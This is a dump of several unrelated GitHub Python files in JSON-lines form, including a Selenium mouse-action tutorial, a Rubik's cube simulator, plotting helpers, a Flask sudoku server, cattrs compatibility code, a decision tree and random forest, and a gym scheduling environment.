ActionChains(driver)\r\n\r\n# 主要操作:\r\n# click(on_element=None) # 鼠标单击。适用于链接、选框等元素。\r\n# click_and_hold(on_element=None) # 鼠标单击并且按住部分\r\n# double_click(on_element=None) # 鼠标双击\r\n# context_click(on_element=None) # 鼠标右击\r\n# drag_and_drop(source, target) # 鼠标拖拽\r\n# drag_and_drop_by_offset(source, xoffset, yoffset) # 将目标拖拽到目标位置\r\n# key_down(value, element=None) # 按下某个键,实现快捷键操作\r\n# key_up(value, element=None) # 松下某个键,一般和key_down操作一起使用\r\n# move_to_element(to_element) # 移动到指定元素\r\n# move_to_element_with_offset(to_element, xoffset, yoffset) # 移动鼠标到指定坐标\r\n# release(on_element=None) # 释放按下的鼠标\r\n# perform() # 将之前一系列的ActionChains执行\r\n\r\n# 
鼠标移动到\"设置\",并悬停\r\nActionChains(driver).move_to_element(element).perform()\r\nsleep(1)\r\n\r\n# 鼠标悬停时,定位元素,超链接\"搜索设置\",然后实现单击操作\r\ndriver.find_element_by_link_text(\"搜索设置\").click()\r\n\r\ndriver.refresh()\r\n\r\n# 鼠标在指定元素上右键1\r\nelement2 = driver.find_element_by_xpath('//*[@id=\"s_lg_img\"]') # 百度logo图片\r\nsleep(1)\r\nActionChains(driver).context_click(element2).perform()\r\n\r\n# 鼠标在指定元素上右键2\r\n# ActionChains(driver).context_click(element).send_keys(Keys.ARROW_DOWN).send_keys(Keys.ENTER).perform()\r\n\r\nsleep(1)\r\ndriver.quit()\r\n","repo_name":"holmes-tao/test","sub_path":"第3章_常用API操作_A/04_常用API操作_鼠标单击、悬停操作.py","file_name":"04_常用API操作_鼠标单击、悬停操作.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18418527781","text":"#!/usr/bin/env python\n\n\"\"\"\nN x N x N Rubik's Cube\n\"\"\"\n\n__author__ = \"Edwin J. Son \"\n__version__ = \"0.0.1a\"\n__date__ = \"May 27 2017\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass cube:\n colors = ('white', 'yellow', 'orange', 'red', 'skyblue', 'blue')\n faces = ('front', 'back', 'left', 'right', 'top', 'bottom')\n def __init__(self, n_shuffle=50, size=3):\n self.size = size\n self.face_dic = {self.faces[i]:i for i in range(len(self.faces))}\n self.data = np.ones((len(self.faces), size, size),dtype='int') * np.arange(len(self.faces)).reshape((len(self.faces), 1, 1))\n self.shuffle(n_shuffle)\n return\n def shuffle(self, n_shuffle=20):\n if n_shuffle < 1:\n n_shuffle = 20\n for i in range(n_shuffle):\n ridx = np.random.randint(2)\n fidx = np.random.randint(len(self.faces))\n lidx = np.random.randint((self.size + 1) // 2)\n if ridx == 0:\n self.clockwise(self.faces[fidx], lidx)\n else:\n self.cntclkwise(self.faces[fidx], lidx)\n return\n def clockwise(self, face='front', level=0):\n if face not in self.faces:\n raise RuntimeError('\"{}\" is not in self.faces'.format(face))\n if level < 0:\n l = 0\n elif level < self.size:\n l = level\n else:\n l = self.size - 1\n il = self.size - 1 - l\n if (self.face_dic[face] % 2) == 0:\n fidx = (self.face_dic[face] + np.arange(len(self.faces))) % len(self.faces)\n else:\n fidx = (self.face_dic[face] + np.arange(len(self.faces),0,-1)) % len(self.faces)\n if l == 0:\n self.data[fidx[0],:,:] = self.data[fidx[0],::-1,:].T\n elif l == self.size - 1:\n self.data[fidx[1],:,:] = self.data[fidx[1],:,::-1].T\n bak = self.data[fidx[2], :, il].copy()\n self.data[fidx[2], :, il] = self.data[fidx[5], ::-1, l]\n self.data[fidx[5], :, l] = self.data[fidx[3], il, :]\n self.data[fidx[3], il, :] = self.data[fidx[4], l, ::-1]\n self.data[fidx[4], l, :] = bak[:]\n return\n def cntclkwise(self, face='front', level=0):\n if face not in self.faces:\n raise RuntimeError('\"{}\" is not in self.faces'.format(face))\n if level < 0:\n l = 0\n elif level < self.size:\n l = level\n else:\n l = self.size - 1\n il = self.size - 1 - l\n if (self.face_dic[face] % 2) == 0:\n fidx = (self.face_dic[face] + np.arange(len(self.faces))) % len(self.faces)\n else:\n fidx = (self.face_dic[face] + np.arange(len(self.faces),0,-1)) % len(self.faces)\n if l == 0:\n self.data[fidx[0],:,:] = self.data[fidx[0],:,::-1].T\n elif l == self.size - 1:\n self.data[fidx[1],:,:] = self.data[fidx[1],::-1,:].T\n bak = self.data[fidx[2], ::-1, il].copy()\n self.data[fidx[2], :, il] = self.data[fidx[4], l, :]\n self.data[fidx[4], l, :] = self.data[fidx[3], il, ::-1]\n self.data[fidx[3], il, :] = self.data[fidx[5], :, l]\n 
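# --- Added illustration (hedged), for the ActionChains entry above:
# actions can also be queued and fired with a single perform(). A minimal
# drag-and-drop sketch in the same (legacy) Selenium API style; the URL and
# element ids are assumed placeholder values.
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains

driver = webdriver.Chrome()
driver.get('https://example.com')                # placeholder URL
source = driver.find_element_by_id('drag-me')    # assumed element id
target = driver.find_element_by_id('drop-here')  # assumed element id
ActionChains(driver).drag_and_drop(source, target).perform()
driver.quit()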
self.data[fidx[5], :, l] = bak[:]\n return\n def display(self, face=None, lw=2, figsize=(6, 4), dpi=75):\n fig = plt.figure(figsize=figsize, dpi=dpi)\n X = np.linspace(0,1,10)\n Y, Z = np.meshgrid(X, X)\n X = np.zeros_like(Y)\n ax = [fig.add_subplot(2,3,i+1, projection='3d') for i in range(6)]\n ax[0].set_title('top')\n ax[1].set_title('top')\n ax[2].set_title('top')\n ax[3].set_title('left')\n ax[4].set_title('front')\n ax[5].set_title('right')\n for i in range(6):\n ax[i].set_xticks([])\n ax[i].set_yticks([])\n ax[i].set_zticks([])\n for i in range(self.size):\n ii = self.size - 1 - i\n for j in range(self.size):\n ij = self.size - 1 - j\n #c = self.colors[1+i+2*j]\n # front\n c = self.colors[self.data[self.face_dic['front'], i, j]]\n ax[0].plot_surface(X+self.size, Y+i, Z+j, color=c, lw=lw)\n ax[3].plot_surface(X+self.size, Y+j, Z+ii, color=c, lw=lw)\n ax[1].plot_surface(Y+i, X, Z+j, color=c, lw=lw)\n ax[4].plot_surface(Y+i, Z+j, X+self.size, color=c, lw=lw)\n # back\n c = self.colors[self.data[self.face_dic['back'], i, j]]\n ax[2].plot_surface(X+self.size, Y+ij, Z+i, color=c, lw=lw)\n ax[5].plot_surface(X+self.size, Y+i, Z+j, color=c, lw=lw)\n # left\n c = self.colors[self.data[self.face_dic['left'], i, j]]\n ax[0].plot_surface(Y+j, X, Z+ii, color=c, lw=lw)\n ax[3].plot_surface(Y+j, Z+ii, X+self.size, color=c, lw=lw)\n # right\n c = self.colors[self.data[self.face_dic['right'], i, j]]\n ax[1].plot_surface(X+self.size, Y+ii, Z+ij, color=c, lw=lw)\n ax[4].plot_surface(X+self.size, Y+ij, Z+i, color=c, lw=lw)\n ax[2].plot_surface(Y+ii, X, Z+ij, color=c, lw=lw)\n ax[5].plot_surface(Y+ii, Z+ij, X+self.size, color=c, lw=lw)\n # top\n c = self.colors[self.data[self.face_dic['top'], i, j]]\n ax[0].plot_surface(Y+ii, Z+ij, X+self.size, color=c, lw=lw)\n ax[1].plot_surface(Y+ij, Z+i, X+self.size, color=c, lw=lw)\n ax[2].plot_surface(Y+i, Z+j, X+self.size, color=c, lw=lw)\n # bottom\n c = self.colors[self.data[self.face_dic['bottom'], i, j]]\n ax[3].plot_surface(Y+ij, X, Z+i, color=c, lw=lw)\n ax[4].plot_surface(Y+ii, X, Z+ij, color=c, lw=lw)\n ax[5].plot_surface(Y+j, X, Z+ii, color=c, lw=lw)\n return\n","repo_name":"soneddy/pyrubiks","sub_path":"python/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":5916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35642471353","text":"import os\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Set Matplotlib font and style settings\nrc_fonts = {\n 'xtick.direction': 'in',\n 'ytick.direction': 'in',\n 'xtick.labelsize': 10,\n 'ytick.labelsize': 10,\n 'ytick.right': True,\n 'xtick.top': True,\n \"font.family\": \"times\",\n \"font.size\": 10,\n 'axes.titlesize': 10,\n \"legend.fontsize\": 10,\n # \"axes.spines.right\": False,\n # \"axes.spines.top\": False,\n # 'figure.figsize': (8, 3.5),\n}\nplt.rcParams.update(rc_fonts)\nplt.rc('axes', unicode_minus=False)\n\ndef get_results(algo_domain_path, metrics):\n res_dict = {}\n seeds = os.listdir(algo_domain_path)\n for seed in seeds:\n csv_path = os.path.join(algo_domain_path, seed, 'progress.csv')\n print('load file:', csv_path)\n data = np.genfromtxt(csv_path, delimiter=',', names=True, dtype=float)\n for metric in metrics:\n if metric in res_dict.keys():\n res_dict[metric].append(data[metric])\n else:\n res_dict[metric] = [data[metric]]\n for metric in metrics:\n min_row = min([len(col) for col in res_dict[metric]])\n clip_res = [col[0:min_row] for col in res_dict[metric]]\n res_dict[metric] = 
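# --- Added usage sketch (hedged), for the cube class above: construct a
# 3x3x3 cube shuffled by 20 random quarter-turns, apply two moves, and
# render all six views with the display helper.
import matplotlib.pyplot as plt

c = cube(n_shuffle=20, size=3)
c.clockwise('front', level=0)
c.cntclkwise('top', level=1)
c.display()
plt.show()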
np.stack(clip_res, -1)\n return res_dict\n\ndef smooth_results(results, smoothing_window=100):\n smoothed = np.zeros_like(results)\n for idx in range(len(smoothed)):\n if idx == 0:\n smoothed[idx] = results[idx]\n continue\n start_idx = max(0, idx - smoothing_window)\n smoothed[idx] = np.mean(results[start_idx:idx], axis=0)\n return smoothed\n\ndef get_parsed_dict(paths):\n \"\"\"\n path format: .../task/algo/domain/seed/progress.csv\n input: paths is a list of mlutiple task paths\n \"\"\"\n domain_algo_plot = {} # dict for plotting figure\n algo_domain_path = {} # dict for loading data\n algos = [] # list for collecting all algo\n for path in paths:\n algos_ = os.listdir(path)\n algos.extend(algos_)\n for algo in algos_:\n domains = os.listdir(os.path.join(path, algo))\n for domain in domains:\n if domain not in domain_algo_plot.keys():\n domain_algo_plot[domain] = [algo]\n else:\n domain_algo_plot[domain].append(algo)\n assert algo + '-' + domain not in algo_domain_path.keys()\n algo_domain_path[algo + '-' + domain] = os.path.join(path, algo, domain)\n print('retrieved algos', algos)\n return domain_algo_plot, algo_domain_path, algos","repo_name":"raincchio/Make-Figure-For-Scientific-Paper","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"32371859180","text":"import math #brings in any math function that isn't included with python\r\nimport datetime\r\n\r\nrealNumber = 5.5555\r\nprint(round(realNumber,2))#rounds the number to 2 dp\r\nprint(math.trunc(realNumber))#rounds any real number down to the nearest whole number\r\nmultiply = 2*5#all variable names are how to perform each arithmetic function\r\ndivide = 2/5\r\nadd = 2 + 5\r\nsubtract = 2-5\r\nexponentiation = 2**5\r\nsquare_root = math.sqrt(25)\r\nmodulus = 5 % 2#gives the remainder which is 1\r\ndiv = 5//2#gives the maximum amount of times the whole number goes into the other. 
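# --- Added usage sketch (hedged), for smooth_results above: the helper is
# a trailing moving average over the row axis — each row i becomes the mean
# of rows max(0, i - window)..i-1 — and the column structure (one column
# per seed) is preserved.
import numpy as np

curves = np.random.randn(500, 3).cumsum(axis=0)  # three noisy seed curves
smoothed = smooth_results(curves, smoothing_window=100)
assert smoothed.shape == curves.shape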
this gives 2\r\n\r\n\r\nstring = \"Hello World\"\r\nlen(string) #returns the length of the string\r\nprint(string[0:3])#returns the portion of the string within these indexes\r\nprint(string.find(\"Hel\"))#determines if \"Hel\" is contained within string and displays the index of where it starts\r\nprint(ord(\"a\"))#prints the ascii number of this character\r\nprint(chr(97))#prints the ascii character of this number\r\n\r\nint(\"1\")#converts the character \"1\" into an integer\r\nstr(123)#converts the integer 123 to a string\r\nfloat(\"123.456\")#converts the string into a real number\r\nstr(123.456)\r\n\r\nprint(datetime.date(2016,12,16))\r\n\r\nhello = \"hi\"#sets the string \"hi\" to the variable identifier hello\r\nbye = input()#sets whatever the user types in to the identifier bye\r\n\r\ntotalBill = int(input(\"What is the total of your bill?\"))\r\ntotalwithTip = totalBill * 1.1\r\nprint(\"Each person owes\",str(round(totalwithTip/10,2))+\".\")\r\n","repo_name":"ConnieLo/fundamentals","sub_path":"Programming Basics.py","file_name":"Programming Basics.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18916019071","text":"from flask import Flask,jsonify, render_template, request\nfrom Main import SudokuSolver\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'f2dc4afa20c6c6b4b7b0b63227fbf4d6'\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/solve', methods=['POST'])\ndef solve_sudoku():\n ss = SudokuSolver(request.form['input_string'])\n if not ss.check():\n return 'Invalid'\n else:\n return ss.toString(ss.search(ss.grid_values()))\n \n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=False, port=3000)\n","repo_name":"wnprince/sudoku-solving","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"72474027969","text":"import builtins\nimport sys\nfrom collections.abc import MutableSet as AbcMutableSet\nfrom collections.abc import Set as AbcSet\nfrom dataclasses import MISSING\nfrom dataclasses import fields as dataclass_fields\nfrom dataclasses import is_dataclass\nfrom typing import AbstractSet as TypingAbstractSet\nfrom typing import Any, Dict, FrozenSet, List\nfrom typing import Mapping as TypingMapping\nfrom typing import MutableMapping as TypingMutableMapping\nfrom typing import MutableSequence as TypingMutableSequence\nfrom typing import MutableSet as TypingMutableSet\nfrom typing import NewType, Optional\nfrom typing import Sequence as TypingSequence\nfrom typing import Set as TypingSet\nfrom typing import Tuple, get_type_hints\n\nfrom attr import NOTHING, Attribute, Factory\nfrom attr import fields as attrs_fields\nfrom attr import resolve_types\n\nversion_info = sys.version_info[0:3]\nis_py37 = version_info[:2] == (3, 7)\nis_py38 = version_info[:2] == (3, 8)\nis_py39_plus = version_info[:2] >= (3, 9)\nis_py310_plus = version_info[:2] >= (3, 10)\n\nif is_py37:\n\n def get_args(cl):\n return cl.__args__\n\n def get_origin(cl):\n return getattr(cl, \"__origin__\", None)\n\n from typing_extensions import Protocol\n\nelse:\n from typing import Protocol, get_args, get_origin # NOQA\n\nif \"ExceptionGroup\" not in dir(builtins):\n from exceptiongroup import ExceptionGroup\nelse:\n ExceptionGroup = ExceptionGroup\n\n\ndef has(cls):\n return hasattr(cls, \"__attrs_attrs__\") or 
hasattr(cls, \"__dataclass_fields__\")\n\n\ndef has_with_generic(cls):\n \"\"\"Test whether the class if a normal or generic attrs or dataclass.\"\"\"\n return has(cls) or has(get_origin(cls))\n\n\ndef fields(type):\n try:\n return type.__attrs_attrs__\n except AttributeError:\n try:\n return dataclass_fields(type)\n except AttributeError:\n raise Exception(\"Not an attrs or dataclass class.\")\n\n\ndef adapted_fields(cl) -> List[Attribute]:\n \"\"\"Return the attrs format of `fields()` for attrs and dataclasses.\"\"\"\n if is_dataclass(cl):\n attrs = dataclass_fields(cl)\n if any(isinstance(a.type, str) for a in attrs):\n # Do this conditionally in case `get_type_hints` fails, so\n # users can resolve on their own first.\n type_hints = get_type_hints(cl)\n else:\n type_hints = {}\n return [\n Attribute(\n attr.name,\n attr.default\n if attr.default is not MISSING\n else (\n Factory(attr.default_factory)\n if attr.default_factory is not MISSING\n else NOTHING\n ),\n None,\n True,\n None,\n True,\n attr.init,\n True,\n type=type_hints.get(attr.name, attr.type),\n )\n for attr in attrs\n ]\n else:\n attribs = attrs_fields(cl)\n if any(isinstance(a.type, str) for a in attribs):\n # PEP 563 annotations - need to be resolved.\n resolve_types(cl)\n attribs = attrs_fields(cl)\n return attribs\n\n\ndef is_hetero_tuple(type: Any) -> bool:\n origin = getattr(type, \"__origin__\", None)\n return origin is tuple and ... not in type.__args__\n\n\ndef is_protocol(type: Any) -> bool:\n return issubclass(type, Protocol) and getattr(type, \"_is_protocol\", False)\n\n\nOriginAbstractSet = AbcSet\nOriginMutableSet = AbcMutableSet\n\nif is_py37 or is_py38:\n Set = TypingSet\n AbstractSet = TypingAbstractSet\n MutableSet = TypingMutableSet\n\n Sequence = TypingSequence\n MutableSequence = TypingMutableSequence\n MutableMapping = TypingMutableMapping\n Mapping = TypingMapping\n FrozenSetSubscriptable = FrozenSet\n TupleSubscriptable = Tuple\n\n from collections import Counter as ColCounter\n from typing import Counter, Union, _GenericAlias\n\n def is_annotated(_):\n return False\n\n def is_tuple(type):\n return type in (Tuple, tuple) or (\n type.__class__ is _GenericAlias and issubclass(type.__origin__, Tuple)\n )\n\n def is_union_type(obj):\n return (\n obj is Union or isinstance(obj, _GenericAlias) and obj.__origin__ is Union\n )\n\n def get_newtype_base(typ: Any) -> Optional[type]:\n supertype = getattr(typ, \"__supertype__\", None)\n if (\n supertype is not None\n and getattr(typ, \"__qualname__\", \"\") == \"NewType..new_type\"\n and typ.__module__ in (\"typing\", \"typing_extensions\")\n ):\n return supertype\n return None\n\n def is_sequence(type: Any) -> bool:\n return type in (List, list, Tuple, tuple) or (\n type.__class__ is _GenericAlias\n and (\n type.__origin__ not in (Union, Tuple, tuple)\n and issubclass(type.__origin__, TypingSequence)\n )\n or (type.__origin__ in (Tuple, tuple) and type.__args__[1] is ...)\n )\n\n def is_mutable_set(type):\n return type is set or (\n type.__class__ is _GenericAlias and issubclass(type.__origin__, MutableSet)\n )\n\n def is_frozenset(type):\n return type is frozenset or (\n type.__class__ is _GenericAlias and issubclass(type.__origin__, FrozenSet)\n )\n\n def is_mapping(type):\n return type in (TypingMapping, dict) or (\n type.__class__ is _GenericAlias\n and issubclass(type.__origin__, TypingMapping)\n )\n\n bare_generic_args = {\n List.__args__,\n TypingSequence.__args__,\n TypingMapping.__args__,\n Dict.__args__,\n TypingMutableSequence.__args__,\n 
Tuple.__args__,\n None, # non-parametrized containers do not have `__args__ attribute in py3.7-8\n }\n\n def is_bare(type):\n return getattr(type, \"__args__\", None) in bare_generic_args\n\n def is_counter(type):\n return (\n type in (Counter, ColCounter)\n or getattr(type, \"__origin__\", None) is ColCounter\n )\n\n if is_py38:\n from typing import Literal\n\n def is_literal(type) -> bool:\n return type.__class__ is _GenericAlias and type.__origin__ is Literal\n\n else:\n # No literals in 3.7.\n def is_literal(_) -> bool:\n return False\n\n def is_generic(obj):\n return isinstance(obj, _GenericAlias)\n\n def copy_with(type, args):\n \"\"\"Replace a generic type's arguments.\"\"\"\n return type.copy_with(args)\n\nelse:\n # 3.9+\n from collections import Counter\n from collections.abc import Mapping as AbcMapping\n from collections.abc import MutableMapping as AbcMutableMapping\n from collections.abc import MutableSequence as AbcMutableSequence\n from collections.abc import MutableSet as AbcMutableSet\n from collections.abc import Sequence as AbcSequence\n from collections.abc import Set as AbcSet\n from types import GenericAlias\n from typing import Annotated\n from typing import Counter as TypingCounter\n from typing import (\n Union,\n _AnnotatedAlias,\n _GenericAlias,\n _SpecialGenericAlias,\n _UnionGenericAlias,\n )\n\n try:\n # Not present on 3.9.0, so we try carefully.\n from typing import _LiteralGenericAlias\n\n def is_literal(type) -> bool:\n return type.__class__ is _LiteralGenericAlias\n\n except ImportError:\n\n def is_literal(_) -> bool:\n return False\n\n Set = AbcSet\n AbstractSet = AbcSet\n MutableSet = AbcMutableSet\n Sequence = AbcSequence\n MutableSequence = AbcMutableSequence\n MutableMapping = AbcMutableMapping\n Mapping = AbcMapping\n FrozenSetSubscriptable = frozenset\n TupleSubscriptable = tuple\n\n def is_annotated(type) -> bool:\n return getattr(type, \"__class__\", None) is _AnnotatedAlias\n\n def is_tuple(type):\n return (\n type in (Tuple, tuple)\n or (type.__class__ is _GenericAlias and issubclass(type.__origin__, Tuple))\n or (getattr(type, \"__origin__\", None) is tuple)\n )\n\n if is_py310_plus:\n\n def is_union_type(obj):\n from types import UnionType\n\n return (\n obj is Union\n or (isinstance(obj, _UnionGenericAlias) and obj.__origin__ is Union)\n or isinstance(obj, UnionType)\n )\n\n def get_newtype_base(typ: Any) -> Optional[type]:\n if typ is NewType or isinstance(typ, NewType):\n return typ.__supertype__\n return None\n\n else:\n\n def is_union_type(obj):\n return (\n obj is Union\n or isinstance(obj, _UnionGenericAlias)\n and obj.__origin__ is Union\n )\n\n def get_newtype_base(typ: Any) -> Optional[type]:\n supertype = getattr(typ, \"__supertype__\", None)\n if (\n supertype is not None\n and getattr(typ, \"__qualname__\", \"\") == \"NewType..new_type\"\n and typ.__module__ in (\"typing\", \"typing_extensions\")\n ):\n return supertype\n return None\n\n def is_sequence(type: Any) -> bool:\n origin = getattr(type, \"__origin__\", None)\n return (\n type\n in (\n List,\n list,\n TypingSequence,\n TypingMutableSequence,\n AbcMutableSequence,\n Tuple,\n tuple,\n )\n or (\n type.__class__ is _GenericAlias\n and (\n (origin is not tuple)\n and issubclass(origin, TypingSequence)\n or origin is tuple\n and type.__args__[1] is ...\n )\n )\n or (origin in (list, AbcMutableSequence, AbcSequence))\n or (origin is tuple and type.__args__[1] is ...)\n )\n\n def is_mutable_set(type):\n return (\n type in (TypingSet, TypingMutableSet, set)\n or (\n 
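# --- Added note + sketch (hedged), on get_newtype_base above: the qualname
# literal "NewType..new_type" checked in both branches looks like markup
# stripping damage — CPython's actual qualname is "NewType.<locals>.new_type".
# With that string restored, the helper unwraps one NewType level:
from typing import NewType

UserId = NewType("UserId", int)
assert get_newtype_base(UserId) is int   # __supertype__ is unwrapped
assert get_newtype_base(int) is None     # plain types pass through as None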
type.__class__ is _GenericAlias\n and issubclass(type.__origin__, TypingMutableSet)\n )\n or (getattr(type, \"__origin__\", None) in (set, AbcMutableSet, AbcSet))\n )\n\n def is_frozenset(type):\n return (\n type in (FrozenSet, frozenset)\n or (\n type.__class__ is _GenericAlias\n and issubclass(type.__origin__, FrozenSet)\n )\n or (getattr(type, \"__origin__\", None) is frozenset)\n )\n\n def is_bare(type):\n return isinstance(type, _SpecialGenericAlias) or (\n not hasattr(type, \"__origin__\") and not hasattr(type, \"__args__\")\n )\n\n def is_mapping(type):\n return (\n type in (TypingMapping, Dict, TypingMutableMapping, dict, AbcMutableMapping)\n or (\n type.__class__ is _GenericAlias\n and issubclass(type.__origin__, TypingMapping)\n )\n or (\n getattr(type, \"__origin__\", None)\n in (dict, AbcMutableMapping, AbcMapping)\n )\n or issubclass(type, dict)\n )\n\n def is_counter(type):\n return (\n type in (Counter, TypingCounter)\n or getattr(type, \"__origin__\", None) is Counter\n )\n\n def is_generic(obj):\n return isinstance(obj, _GenericAlias) or isinstance(obj, GenericAlias)\n\n def copy_with(type, args):\n \"\"\"Replace a generic type's arguments.\"\"\"\n if is_annotated(type):\n # typing.Annotated requires a special case.\n return Annotated[args] # type: ignore\n return type.__origin__[args]\n\n\ndef is_generic_attrs(type):\n return is_generic(type) and has(type.__origin__)\n","repo_name":"bardadon/imdb_data_engineering","sub_path":"lib/python3.10/site-packages/cattrs/_compat.py","file_name":"_compat.py","file_ext":"py","file_size_in_byte":11903,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"43"} +{"seq_id":"41136925554","text":"import numpy as np\nfrom math import ceil\nfrom collections import Counter\nfrom random import randint\n\n\nclass Node():\n def __init__(self, split=None, left=None, right=None, label=None):\n self.split = split\n self.left = left\n self.right = right\n self.label = label\n\n def isLeaf(self):\n if self.label == None:\n return False\n return True\n\n\nclass DecisionTree():\n def __init__(self, max_height=None):\n self.root = None\n self.max_height = max_height\n\n\n def grow(self, data, labels, curr_depth, max_depth):\n if np.unique(labels).size == 1:\n return Node(label=labels[0])\n\n feature, threshold = self.segmentor(data, labels)\n\n if curr_depth == max_depth or not feature:\n c = Counter(labels)\n mode = c.most_common(1)[0][0]\n return Node(label=mode)\n\n cond = (data[:,feature] < threshold)\n X_l = data[cond]\n Y_l = labels[cond]\n X_r = data[~cond]\n Y_r = labels[~cond] \n\n leftTree = self.grow(X_l, Y_l, curr_depth+1, max_depth)\n rightTree = self.grow(X_r, Y_r, curr_depth+1, max_depth)\n\n return Node(split=(feature, threshold), left=leftTree, right=rightTree)\n\n def impurity(self, Y_l, Y_r):\n H_l = self.entropy(Y_l)\n H_r = self.entropy(Y_r)\n return float((len(Y_l) * H_l) + (len(Y_r) * H_r)) / float(len(Y_l) + len(Y_r))\n\n def entropy(self, Y):\n p_1 = float(Y.sum()) / float(len(Y))\n p_0 = 1. 
- p_1\n\n if p_0 == 0:\n h_0 = 0 \n if p_1 == 0:\n h_1 = 0 \n if p_0 != 0:\n h_0 = -p_0 * np.log2(p_0)\n if p_1 != 0:\n h_1 = -p_1 * np.log2(p_1)\n \n return h_0 + h_1\n\n\n def compress_features(self, vec):\n uniq = np.unique(vec)\n if uniq.size > 1000:\n rnd = lambda x: int(ceil(x / 10000.0))*10000\n return np.unique(map(rnd, uniq))\n elif np.array_equal(uniq, [0,1]):\n return [1]\n return uniq\n\n def segmentor(self, data, labels):\n best_feat = None \n best_threshold = None\n best_impurity = float('inf')\n\n for i in range(len(data.T)):\n feat_vec = data.T[i]\n\n for threshold in self.compress_features(feat_vec):\n cond = (data[:,i] < threshold)\n Y_l = labels[cond]\n Y_r = labels[~cond] \n\n if len(Y_l) == 0 or len(Y_r) == 0: \n continue\n\n curr_impurity = self.impurity(Y_l, Y_r)\n\n if curr_impurity < best_impurity:\n best_feat, best_threshold = i, threshold\n best_impurity = curr_impurity\n\n return (best_feat, best_threshold)\n\n\n def train(self, data, labels):\n self.root = self.grow(data, labels, 0, self.max_height)\n\n def predict(self, data): \n predictions = []\n for i in range(len(data)):\n x = data[i]\n curr = self.root\n while curr.isLeaf() == False:\n feat, thresh = curr.split\n if (i == 1):\n print(feat, thresh)\n if (x[feat] >= thresh):\n curr = curr.right\n else:\n curr = curr.left\n \n predictions.append(curr.label)\n\n\n return np.asarray(predictions).ravel()\n\n\n\nclass RandomForest():\n def __init__(self, num_trees, max_height=None):\n self.num_trees = num_trees\n self.max_height = max_height\n trees = []\n for x in range(num_trees):\n trees.append(DecisionTree(max_height=max_height))\n self.trees = trees\n\n def train(self, data, labels):\n numSamples = data.shape[0] / self.num_trees\n for i in range(self.num_trees):\n rand = np.random.choice(data.shape[0], numSamples)\n self.trees[i].train(data[rand], labels[rand])\n\n def predict(self, data):\n predictions = []\n for tree in self.trees:\n predictions.append(tree.predict(data))\n avg_preds = np.average(predictions, axis=0)\n for i in range(len(avg_preds)):\n if avg_preds[i] >= 0.5:\n avg_preds[i] = 1\n else:\n avg_preds[i] = 0\n return avg_preds\n\n","repo_name":"kiarashm/DecisionTrees","sub_path":"ForestFires.py","file_name":"ForestFires.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18953350979","text":"import logging\n\nimport enum\n\nfrom gosa.common.components.jsonrpc_utils import JSONDataHandler\nfrom sqlalchemy.dialects import postgresql\n\n__import__('pkg_resources').declare_namespace(__name__)\n\n\nclass BackendTypes(enum.Enum):\n unknown = 0\n active_master = 1\n standby_master = 2\n proxy = 3\n\n\nclass BackendTypesEncoder(JSONDataHandler):\n @staticmethod\n def encode(data):\n return {\"__enum__\": str(data), '__jsonclass__': 'gosa.backend.utils.BackendTypes'}\n\n @staticmethod\n def decode(data):\n name, member = data[\"__enum__\"].split(\".\")\n return getattr(BackendTypes, member)\n\n @staticmethod\n def isinstance(data):\n return isinstance(data, BackendTypes)\n\n @staticmethod\n def canhandle():\n return \"gosa.backend.utils.BackendTypes\"\n\n\ndef print_query(query_result):\n try:\n return str(query_result.statement.compile(dialect=postgresql.dialect(), compile_kwargs={\"literal_binds\": True}))\n except Exception as e:\n logging.getLogger(__name__).warning(str(e))\n return str(query_result)\n 
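# --- Added note (hedged), on the RandomForest entry above: under Python 3,
# `numSamples = data.shape[0] / self.num_trees` is a float, and
# np.random.choice rejects a non-integer sample size. The likely intended
# bootstrap step uses floor division:
#     num_samples = data.shape[0] // self.num_trees
#     rand = np.random.choice(data.shape[0], num_samples)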
pass","repo_name":"gonicus/gosa","sub_path":"backend/src/gosa/backend/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"43"} +{"seq_id":"28866875231","text":"# -*- coding: utf-8 -*-\nimport gym\nimport numpy as np\n\nfrom .scheduler import Scheduler\nfrom .obs import Observation\n\nfrom .EnvirConf import envConfig as ec\nfrom .EnvirConf import obConfig as oc\n\nclass ScheEnv(gym.Env):\n def __init__(self, seed = 0, mode=None):\n self.envConfig = ec\n self.obsConfig = oc\n \n self.partNum = self.envConfig.partNum\n self.machNum = self.envConfig.machNum\n \n self.sche = Scheduler(mode,seed)\n self.obsGen = Observation(self.sche)\n self.actObsInit()\n \n def reset(self):\n self.sche.reset()\n canvas_obs = self.obsGen.getState()\n return canvas_obs\n \n def step(self, action):\n reward = self.sche.step(action[0])#mult-actions frame\n other_reward , done , grade = self.sche.is_end()\n \n canvas_obs = self.obsGen.getState()\n reward += other_reward\n info = {}\n if done:\n info['episode'] = {'r':round(grade)}\n return canvas_obs,reward,done,info\n \n def getActionMask(self):\n vObs = np.array([0],dtype=np.float)\n partAvai = self.sche.available()\n \n partMask = np.zeros(self.partNum)\n partMask[partAvai] = 1\n return vObs,partMask\n \n def actObsInit(self):\n self.action_space = [\n gym.spaces.Discrete(self.partNum),\n ]\n \n 